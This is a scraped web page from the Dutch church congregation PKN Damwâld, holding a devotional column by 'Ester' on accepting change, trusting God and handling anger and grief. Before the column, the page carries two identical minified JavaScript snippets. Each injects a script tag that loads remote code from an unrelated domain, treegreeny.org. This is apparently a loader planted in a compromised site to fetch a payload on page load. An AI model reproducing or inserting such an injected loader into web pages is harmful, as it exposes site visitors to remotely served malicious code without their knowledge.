;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Alles verandert - PKN Damwâld

Alles verandert

Gepubliceerd op: vrijdag 10 november

In de natuur verandert alles continu. We zijn in de zomer en het najaar heel dankbaar voor de oogst. Soms zou je willen dat je altijd kunt leven met een overvloedige oogst, maar dat is niet hoe de natuur werkt. Na de herfst komt de winter waar de natuur zich weer klaar maakt voor de volgende ronde.

Zo werkt het ook in ons leven. Probeer daarom niet om continu alles te houden zoals je het altijd gekend hebt – familietradities, regels, gebruiken, je eetpatroon. De strijd om de dingen te houden zoals ze altijd geweest zijn, is een waar je heel moe van wordt en die tegen de natuur in gaat. Verandering hoort bij het leven, daar lezen we ook over in Prediker.

Als we gaan accepteren dat alles continu verandert en leren op God te vertrouwen dan kunnen we soepel om gaan met alle veranderingen in ons leven. God wijst ons de juiste weg en geeft ons voldoende signalen. Alleen herkennen we in die signalen niet altijd de stem van God. Er gebeurt zoveel om ons heen en soms zijn ons eigen emoties zo heftig, dat we continu afgeleid zijn en niet meer weten hoe we de stem van God kunnen horen in ons leven.

Ik heb zelf ook meerder perioden in mijn leven gekend waarin ik vast wilde houden aan iets wat aan het veranderen was. Het heeft me veel energie gekost en dit was een hele verdrietige periode. Pas later realiseerde ik me dat door alles heen altijd Gods stem heeft geklonken om me de juiste weg te wijzen. Ik luisterde alleen niet naar deze stem, omdat boos en verdrietig was en ik het verleden terug wilde.

Ik leerde anders omgaan met boosheid en verdriet, waardoor er ruimte kwam om te luisteren naar de weg die God mij IN al deze veranderingen wilde laten zien. En dat gun ik U of jou ook.

Als je de emoties boosheid en verdriet op de juiste manier gaat gebruiken dan blijf je er niet in hangen. Dan geeft de boosheid je kracht om actie te ondernemen om jezelf vooruit te helpen in een lastige situatie. En verdriet kun je alleen hebben als je het geluk hebt gehad ergens heel veel van te houden: Als je onder dat verdriet de liefde weer kunt voelen, dan kun je dit verdriet omzetten in dankbaarheid voor al het mooie dat je al in je leven hebt gehad.

Maar dat is niet altijd makkelijk. Daarom is het zo belangrijk om bij moeilijke veranderingen naar binnen te keren, rust te nemen en bewust contact met God te maken. Vraag God waar jij je emoties voor mag gebruiken en vertrouw er op dat God je in elke situatie de weg wijst.

Columnist:Ester

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns